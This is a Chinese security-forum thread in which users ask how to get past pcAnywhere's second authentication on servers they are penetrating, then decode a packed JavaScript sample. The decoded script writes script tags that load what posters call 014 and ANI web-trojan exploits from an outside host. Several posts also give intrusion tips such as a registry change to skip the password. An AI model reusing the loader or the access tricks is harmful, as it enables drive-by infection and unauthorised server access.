标题:
[讨论]pcanywhere二次验证密码存放在哪?
[打印本页]
作者:
valen886
时间:
2008-7-25 13:50
标题:
[讨论]pcanywhere二次验证密码存放在哪?
[讨论]pcanywhere二次验证密码存放在哪?
议题作者:hackest
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
大家都知道pcanywhere是一个远程管理服务器的工具
但是在渗透中如何遇到服务器处于锁定状态
而我们又没有管理员权限的时候
也就是只拿到了pcanywhere的连接密码
却没有系统用户和密码
处于锁定状态的问题以前讨论过了
不过解决的方法貌似不太完美和实际
而且pcanywhere在连接上的时候即使没有管理员权限
也可以直接重启服务器
不过如果想要执行传送文件或者执行命令之类的操作就会要求进行二次验证
这个密码和pcanywhere的连接密码试了很多都没有发现相同的
不知道它的密码存放在哪里
总之找遍了*.cif文件所得的密码都无法通过验证!
难道是要求验证系统用户?!
希望大家讨论下,指点下小弟,嘿嘿
My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/
帖子882 精华
20
积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3
查看个人网站
查看详细资料
TOP
良辰择日,预测咨询,公司改名,权威易经
寂寞宝贝
荣誉会员
作者:
虎儿
时间:
2008-7-25 13:50
二次验证密码?不会呀!我要传的话他直接让我输系统的.........成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
TOP
爱要怎么说出口
抗战二十年
晶莹剔透§烈日灼然
作者:
小小夏
时间:
2008-7-25 13:50
兄弟借个地方用一下 因为我不能发贴 谢谢!
--------------------------------------------------------
谁能帮我解密这段代码
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('A("\\7\\9\\m\\6\\l\\k\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\z\\d\\5\\9\\n\\f\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\c\\u\\1\\b\\9\\1\\u\\j\\i\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\y\\d\\e\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\j\\i\\j\\i\\x\\6\\4\\n\\f\\d\\9\\0\\a\\e\\5\\7\\0\\d\\w\\7\\9\\m\\6\\v")',37,37,'164|42|163|57|143|162|157|151|160|156|56|134|11|145|167|155|76|74|12|15|75|40|146|165|152|113|61|71|72|150|53|51|50|144|116|126|eval'.split('|'),0,{}))
代码地址
http://7y7.us/2.js
不经风雨,怎见彩虹?
帖子30 精华
0
积分68 阅读权限40 性别男 在线时间31 小时 注册时间2006-10-11 最后登录2008-4-26
查看详细资料
TOP
少女暴富的隐秘(图)
netpatch
荣誉会员
作者:
阿翠
时间:
2008-7-25 13:50
第一层加密
解后
eval("\151\156\146\157\40\75\11\11\42\74\163\143\162\151\160\164\40\163\162\143\75\134\42\150\164\164\160\72\57\57\167\163\71\61\56\143\157\155\57\157\113\57\126\145\162\156\165\155\56\152\163\134\42\76\74\57\163\143\162\151\160\164\76\42\11\53\42\134\156\42\53\15\12\11\11\42\74\163\143\162\151\160\164\40\163\162\143\75\134\42\150\164\164\160\72\57\57\167\163\71\61\56\143\157\155\57\157\113\57\116\145\167\56\152\163\134\42\76\74\57\163\143\162\151\160\164\76\42\15\12\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\151\156\146\157\51")
第二层加密
解后
info = "<script src=\"http://ws91.com/oK/Vernum.js\"></script>" +"\n"+
"<script src=\"http://ws91.com/oK/New.js\"></script>"
document.write(info)
ANI网马!通往胜利的路不只一条!
帖子89 精华
4
积分3262 阅读权限100 在线时间212 小时 注册时间2005-3-23 最后登录2008-7-2
查看详细资料
TOP
netpatch
荣誉会员
作者:
凡人
时间:
2008-7-25 13:50
http://ws91.com/oK/Vernum.js
//014网马
http://ws91.com/oK/New.js
//ANI网马通往胜利的路不只一条!
帖子89 精华
4
积分3262 阅读权限100 在线时间212 小时 注册时间2005-3-23 最后登录2008-7-2
查看详细资料
TOP
少女暴富的隐秘(图)
vikxeo
荣誉会员
作者:
wwgywl
时间:
2008-7-25 13:50
alert 再 八进制 就ok
帖子58 精华
2
积分182 阅读权限100 性别男 在线时间283 小时 注册时间2005-8-14 最后登录2008-6-6
查看详细资料
TOP
良辰择日,预测咨询,公司改名,权威易经
huangqing
晶莹剔透§烈日灼然
作者:
betty
时间:
2008-7-25 13:50
七贱的,,
他那个网马生成的密码,
搞笑死了,
不知道你知道不知道密码,密码是wokankan
有需要的可以去
偶不是罐水哦
帖子13 精华
0
积分48 阅读权限40 性别男 在线时间83 小时 注册时间2007-1-10 最后登录2008-7-23
查看详细资料
TOP
让女孩一夜变的更有女人味
hackest
运维管理组
作者:
BG7LHT
时间:
2008-7-25 13:50
我汗,我的问题没解决
倒解决了你的问题,晕哦
正所谓强宾不压主
My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/
帖子882 精华
20
积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3
查看个人网站
查看详细资料
TOP
ttfct
荣誉会员
作者:
网飞鸿
时间:
2008-7-25 13:50
跑题了,晕猪,回答的毛的问题哦!
管理员都不看一下索?TTFCT http://WWW.TTFCT.COM
帖子279 精华
4
积分4349 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-20
查看详细资料
TOP
hackest
运维管理组
作者:
Cici
时间:
2008-7-25 13:50
貌似那个不叫二次加密咧
据说就是系统的密码,晕哦!
那岂不是没戏了,郁闷
My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/
帖子882 精华
20
积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3
查看个人网站
查看详细资料
TOP
hhiijj123
晶莹剔透§烈日灼然
作者:
马自达
时间:
2008-7-25 13:50
引用:
引用第9楼hackest于2007-04-19 16:42发表的 :
貌似那个不叫二次加密咧
据说就是系统的密码,晕哦!
那岂不是没戏了,郁闷
是啊 就是系统密码 没有听说什么二次加密的DD
帖子2 精华
0
积分9 阅读权限40 性别男 在线时间4 小时 注册时间2006-8-23 最后登录2007-4-19
查看详细资料
TOP
陆羽
荣誉会员
作者:
5000564
时间:
2008-7-25 13:50
引用:
引用第6楼huangqing于2007-04-19 16:10发表的 :
七贱的,,
他那个网马生成的密码,
搞笑死了,
不知道你知道不知道密码,密码是wokankan
有需要的可以去
.......
楼上不好意思
人家换密码了~.
呵呵
现在是nikankan
帖子11 精华
0
积分38 阅读权限100 在线时间14 小时 注册时间2005-12-22 最后登录2008-7-8
查看详细资料
TOP
heiye88
晶莹剔透§烈日灼然
作者:
dghgs
时间:
2008-7-25 13:50
写个解密页面吧。。。大大们。。。ALERT出来后的数据如何能复制呀。。。比如alert("aaa") 弹出对话框呀。。如何把弹出来的数据复制出来。。谢谢。。
帖子64 精华
0
积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18
查看详细资料
TOP
heiye88
晶莹剔透§烈日灼然
作者:
小树
时间:
2008-7-25 13:50
<SCRIPT LANGUAGE="JavaScript">
alert("\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B")
</SCRIPT>
就会弹出对话框告诉你解密后的结果!
如何保存这个结果呀。。。。。。。。。
帖子64 精华
0
积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18
查看详细资料
TOP
kiss8888
晶莹剔透§烈日灼然
作者:
凯旋归来
时间:
2008-7-25 13:50
引用:
引用第3楼netpatch于2007-04-19 14:07发表的 :
第一层加密
解后
eval("151156146157407511114274163143162151160164401631621437513442150164164160725757167163716156143157155571571135712614516215616515556152163134427674571631431621511601647642115342134156425315121111427416314316215116016440163162143751344215016416416072575716716371615614315715557157113571161451675615216313442767457163143162151160164764215121512144157143165155145156164561671621511641455015115614615751")
第二层加密
解后
.......
俺是一个菜鸟,请问:\\7\\9\\m\\6\\l\\k\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\z\\d\\5\\9\\n\\f\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\c\\u\\1\\b\\9\\1\\u\\j\\i\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\y\\d\\e\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\j\\i\\j\\i\\x\\6\\4\\n\\f\\d\\9\\0\\a\\e\\5\\7\\0\\d\\w\\7\\9\\m\\6\\“
这是用什么工具加密的?谢谢。
帖子1 精华
0
积分9 阅读权限40 在线时间7 小时 注册时间2007-2-21 最后登录2008-7-4
查看详细资料
TOP
heiye88
晶莹剔透§烈日灼然
作者:
callach
时间:
2008-7-25 13:50
顶!<SCRIPT LANGUAGE="JavaScript">
alert("\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B")
</SCRIPT>
就会弹出对话框告诉你解密后的结果!
如何保存这个结果呀。。。。。。。。。
帖子64 精华
0
积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18
查看详细资料
TOP
hackest
运维管理组
作者:
飞翔吧
时间:
2008-7-25 13:50
那个是转换过的十六进制数啦
\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B
这些是十六进制形式的了!My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/
帖子882 精华
20
积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3
查看个人网站
查看详细资料
TOP
heiye88
晶莹剔透§烈日灼然
作者:
fulu
时间:
2008-7-25 13:50
楼上的你没看明白我的意思呵呵。。我是说如何将alert后的结果保存出来...他是个对话框。。。如何复制出来解密后的数据。。。
帖子64 精华
0
积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18
查看详细资料
TOP
寂寞宝贝
荣誉会员
作者:
伤人
时间:
2008-7-25 13:50
我R./........你们搞什么飞机,看清楚这个论题,这不是解密的................要研究专门开个帖子,害得我还以为有牛人弄出那什么二次密码了!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
TOP
hackest
运维管理组
作者:
zhcaihhhh
时间:
2008-7-25 13:50
我也晕了啦
发个帖子被借掉了
下次不敢发了……
My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/
帖子882 精华
20
积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3
查看个人网站
查看详细资料
TOP
heiye88
晶莹剔透§烈日灼然
作者:
fulu
时间:
2008-7-25 13:50
修改注册表..不使用2次密码
帖子64 精华
0
积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18
查看详细资料
TOP
平安年间
晶莹剔透§烈日灼然
作者:
大头虾
时间:
2008-7-25 13:50
我这也有个问题,如果被控端修改了pcanywhere的默认连接端口,保存在哪里?
如果是保存在cif文件里,那么如何才能读取出来?并非高手
帖子62 精华
2
积分245 阅读权限40 性别男 在线时间11 小时 注册时间2006-10-3 最后登录2008-5-13
查看个人网站
查看详细资料
TOP
hackest
运维管理组
作者:
wwgywl
时间:
2008-7-25 13:50
端口貌似是写进注册表的吧
My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/
帖子882 精华
20
积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3
查看个人网站
查看详细资料
TOP
平安年间
晶莹剔透§烈日灼然
作者:
Alice
时间:
2008-7-25 13:50
谢楼上的啦,可惜我遇的那个服务器比较变态,可能没有权限读注册表并非高手
帖子62 精华
2
积分245 阅读权限40 性别男 在线时间11 小时 注册时间2006-10-3 最后登录2008-5-13
查看个人网站
查看详细资料
TOP
remax
晶莹剔透§烈日灼然
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2